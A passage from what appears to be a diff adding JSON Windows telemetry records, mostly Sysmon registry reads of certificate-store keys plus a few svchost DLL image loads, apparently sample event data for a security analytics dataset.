"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879020000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879180000, 
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877930000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "policymanager.dll", + "image_path": "C:\\Windows\\System32\\policymanager.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 
131883570877930000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + 